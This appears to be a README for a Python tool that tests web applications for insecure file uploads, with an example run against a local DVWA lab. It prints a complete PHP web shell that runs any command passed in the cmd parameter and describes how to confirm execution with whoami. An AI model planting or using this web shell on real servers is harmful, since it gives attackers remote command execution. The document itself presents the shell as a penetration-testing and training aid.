This is a simple yet effective CLI tool built in Python to detect insecure file upload vulnerabilities in web applications. It uploads a payload (such as shell.php) to a target URL, then checks whether the file is served from a web-accessible location and whether the server actually executes it rather than just returning it.
Useful for:
- Bug bounty hunters
- Web application testers
- CTF learners
- Anyone practicing ethical hacking
```text
file-upload-vuln-tester/
├── upload_tester.py     # Main CLI tool
├── shell.php            # Sample test payload
├── requirements.txt     # Required Python packages
├── README.md            # Project documentation
└── screenshots/         # Proof of exploitation
    ├── tool_run.png
    ├── browser_rce.png
    └── dvwa_form.png
```
- Python 3.x
- requests
Install dependencies:
```bash
pip install -r requirements.txt
```
```bash
python3 upload_tester.py <upload_url> <file_path> --base <base_url>
python3 upload_tester.py http://localhost/DVWA/vulnerabilities/upload/ shell.php --base http://localhost/DVWA/hackable/
```
- Sends a POST request with a test file
- Checks common upload folders for the file (uploads/, files/, etc.)
- Verifies that the file is reachable and, optionally, that it executes by requesting it with `?cmd=whoami`. A 200 response that contains the raw PHP source means the file is accessible but not being interpreted, which is a weaker finding than code execution.
```php
<?php
// Deliberately insecure test payload: runs whatever the cmd parameter holds.
// system() writes the command's output into the HTTP response, so a request
// for shell.php?cmd=whoami that returns a username proves server-side execution.
if (isset($_REQUEST['cmd'])) {
    system($_REQUEST['cmd']);
}
?>
```
Upload this file to simulate a web shell. Command output in the response (for example the web server's user from `whoami`) confirms code execution; the raw source coming back means the file is reachable but not executed.
- Helps automate a real-world vulnerability test
- Trains for bug bounty methodology
- Demonstrates scripting and scanning skills
This tool is for educational and ethical testing only. Do not use it on systems you do not own or have explicit permission to test.
[Your Name Here] Feel free to connect with me on LinkedIn or contribute to the tool!
MIT License